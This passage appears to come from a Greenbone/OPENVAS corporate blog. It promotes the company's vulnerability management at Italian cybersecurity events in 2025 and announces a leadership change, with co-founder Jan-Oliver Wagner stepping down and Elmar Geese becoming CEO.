OPENVAS S.r.l. will be at all three events, showcasing enterprise-grade vulnerability management solutions, sharing insights on AI-driven security, and demonstrating how organizations can transform compliance from a checkbox exercise into a proactive defense strategy.

The Path Forward

2025 is proving to be a pivotal year for Italian cybersecurity. The threats are real and growing, but so is our collective response. Each conference, each collaboration, and each new innovation brings us closer to transforming today’s challenges into tomorrow’s resilience.

The question isn’t whether you’ll face a cyberattack, it’s whether you’ll be ready when it happens. Don’t wait for the wake-up call. The time to strengthen your cyber defenses is now.

Ready to turn insights into action? Connect with us at the upcoming October events, or reach out today to learn how enterprise-grade vulnerability management can transform your organization’s security position.

Dr. Jan-Oliver Wagner

After many years at the helm of Greenbone, our co-founder, Dr Jan-Oliver Wagner, is stepping down from active operational management. However, he will remain closely associated with the company as a consultant. We would like to thank Dr Wagner for his extraordinary commitment and all that he has achieved for Greenbone since its foundation.

Elmar Geese

The new CEO is Elmar Geese, who has been part of Greenbone’s management team since 2019. With this change in leadership, we are focusing on continuity and stability for our customers, employees and shareholders.